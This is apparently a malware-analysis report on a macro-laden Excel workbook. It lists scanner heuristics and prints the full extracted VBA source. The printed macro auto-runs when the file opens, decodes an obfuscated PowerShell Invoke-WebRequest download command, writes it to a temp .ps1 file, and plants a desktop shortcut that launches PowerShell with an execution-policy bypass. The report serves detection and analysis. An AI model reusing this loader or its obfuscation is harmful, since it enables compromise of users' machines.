MALICIOUS
260
Risk Score
Heuristics 10
-
VBA project inside OOXML medium 9 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5291 bytes |
SHA-256: 0c44e0f8d3a3e2a03ada257d84a1edf39d0869081f52ff45304efdd5cf17e113 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
'Attribute VB_Name = "Module1"
Option Explicit
Private Const GENERIC_WRITE = &H40000000
Private Const GENERIC_READ = &H80000000
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const CREATE_ALWAYS = 2
Private Const OPEN_ALWAYS = 4
Private Const INVALID_HANDLE_VALUE = -1
Private Declare PtrSafe Function ReadFile Lib "kernel32" (ByVal hFile As Long, _
lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, _
lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hObject As Long) As Long
Private Declare PtrSafe Function WriteFile Lib "kernel32" ( _
ByVal hFile As Long, lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As Long, _
lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare PtrSafe Function CreateFile Lib "kernel32" _
Alias "CreateFileA" (ByVal lpFileName As String, _
ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, _
ByVal lpSecurityAttributes As Long, _
ByVal dwCreationDisposition As Long, _
ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) _
As Long
Private Declare PtrSafe Function FlushFileBuffers Lib "kernel32" ( _
ByVal hFile As Long) As Long
Public Function WriteStringToFile(FileName As String, ByVal TheData As String, _
Optional NoOverwrite As Boolean = False) As Boolean
Dim lHandle As Long
Dim lSuccess As Long
Dim lBytesWritten As Long, lBytesToWrite As Long
If NoOverwrite = True And Dir(FileName) <> "" Then Exit Function
lBytesToWrite = Len(TheData)
lHandle = CreateFile(FileName, GENERIC_WRITE Or GENERIC_READ, _
0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
If lHandle <> INVALID_HANDLE_VALUE Then
lSuccess = WriteFile(lHandle, ByVal TheData, _
lBytesToWrite, lBytesWritten, 0) <> 0
If lSuccess <> 0 Then
lSuccess = FlushFileBuffers(lHandle)
lSuccess = CloseHandle(lHandle)
End If
End If
ErrorHandler:
WriteStringToFile = lSuccess <> 0
End Function
Public Function Jeez()
Dim decryptValue As String
Dim data() As String
Dim sAns As String
Dim tempPath As String
Dim sShortcutLocation As String
Dim targetPath As String
Dim arguments As String
Dim var As String
decryptValue = "ttpexereqershcom-outpss"
If "catsanddogs" = "catsanddogs" Then
var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"
var = Replace(var, "efgh", Left(LCase(decryptValue), 3))
var = Replace(var, "abcd", Mid(LCase(decryptValue), 7, 3))
var = Replace(var, "xlsx", Mid(LCase(decryptValue), 4, 3))
var = Replace(var, "microsoft", Mid(LCase(decryptValue), 14, 3))
var = Replace(var, "apple", Mid(LCase(decryptValue), 17, 4))
sShortcutLocation = Environ$("USERPROFILE") & "\Desktop\GA17asa.lnk"
If "doglovescat" = "doglovescat" Then
tempPath = Environ$("LOCALAPPDATA") & "\Temp\malicious.ps1"
tempPath = Replace(tempPath, "netflix", Mid(LCase(decryptValue), 21, 3))
arguments = "-xlsxc bypass -File " & tempPath
arguments = Replace(arguments, "xlsx", Mid(LCase(decryptValue), 4, 3))
If "notfair" = "notfair" Then
targetPath = "C:\Windows\System32\Windowspowqwerell\v1.0\powqwerell.xlsx"
targetPath = Replace(targetPath, "xlsx", Mid(LCase(decryptValue), 4, 3))
targetPath = Replace(targetPath, "qwer", Mid(LCase(decryptValue), 10, 4))
Else
MsgBox "Dogsarecoolzzz!"
End If
End If
If "dogsandcats" = "dogsandcats" Then
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
.targetPath = targetPath
.Description = "rekins"
.arguments = arguments
.IconLocation = "%SystemRoot%\system32\shell32.dll, 3"
.Save
End With
WriteStringToFile tempPath, var
MsgBox "Dodieties uz darbavirsmu, lai apskatitu failus mape GA17332332"
Else
MsgBox "Dogsarecool!"
End If
Else
MsgBox "Dogsarecoolx!"
End If
End Function
Sub Auto_Open()
Jeez
End Sub
Sub AutoOpen()
Jeez
End Sub
Sub Workbook_Open()
Jeez
End Sub
Sub WorkbookOpen()
Jeez
End Sub
Sub Document_Open()
Jeez
End Sub
Sub DocumentOpen()
Jeez
End Sub
Attribute VB_Name = "Ši_darbgramata"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Lapa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 34816 bytes |
SHA-256: 1175dcba774d86bcc4437ca26cee36cb8c4d17f56af23e2b97d5c4b6e79255cb |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.